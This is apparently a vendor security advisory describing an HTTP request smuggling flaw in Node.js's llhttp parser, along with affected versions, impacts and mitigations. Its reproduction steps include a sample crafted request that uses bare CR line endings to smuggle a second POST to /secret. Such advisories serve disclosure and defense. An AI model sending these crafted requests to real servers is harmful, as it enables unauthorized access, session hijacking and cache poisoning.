HD-2024-1407

HTTP Request Smuggling
Affects
Node.js
>=16.0.0 <16.20.1, >=18.0.0 <18.16.1, >=20.0.0 <20.3.1
in
Node.js
Node.js NES
Exclamation circle icon
Patch Available
This Vulnerability has been fixed in the Never-Ending Support (NES) version offered by HeroDevs

‍Overview

The llhttp parser in the http module in multiple versions of Node.js does not strictly use the CRLF sequence to delimit HTTP requests, which can lead to HTTP Request Smuggling (HRS).

HTTP Request Smuggling interferes with the proper fulfillment of requests by an HTTP server. The possible ramifications of this exploit include allowing unauthorized access to a system, allowing an attacker to modify data (in databases, user accounts and other records), session hijacking, information disclosure, cache poisoning and denial of service.

This issue affects the following versions of Node.js: 16.0.0 up to (but excluding) 16.20.1, 18.0.0 up to (but excluding) 18.16.1 and  20.0.0 up to (but excluding) 20.3.1

 

Details

Module Info

Vulnerability Info

This high-severity vulnerability is found in many versions of the llhttp library. Although RFC7230 section 3 indicates that only the CRLF sequence should delimit each header field, vulnerable versions of the library allow just the CR character (without LF) to delimit HTTP header fields.

Since this library is bundled with Node.js, many versions of Node.js in the v16, v18 and v20 branches are affected.

There is no workaround.

Steps To Reproduce

  • Install a vulnerable version of Node.js on a server.
  • Craft an HTTP request that, instead of using \r\n (CRLF), uses just \r (CR) to end header fields. In the  example below, the first request ends with only \r, potentially allowing the second request to be smuggled (hidden to, or misinterpreted by, certain layers of the web server). The second request is formed correctly, because it properly terminates with \r\n.
POST / HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11\r
Cookie: session=abc123\r
\r
data=payload1
POST /secret HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 11
\r\n
data=payload2

Mitigation

Users of Node.js versions that are still under development or maintenance, should upgrade to the latest version of the corresponding release.

Users of Node.js versions that are no longer supported should apply one of te following mitigations:

  • Upgrade affected applications to supported versions of Node.js.
  • Leverage a commercial support partner like HeroDevs for post-EOL security support.

Additional Resources

Vulnerability Details
ID
HD-2024-1407
PROJECT Affected
Node.js
Versions Affected
>=16.0.0 <16.20.1, >=18.0.0 <18.16.1, >=20.0.0 <20.3.1
Published date
October 16, 2024
≈ Fix date
June 30, 2024
Fixed in
Severity
High
Category
HTTP Request Smuggling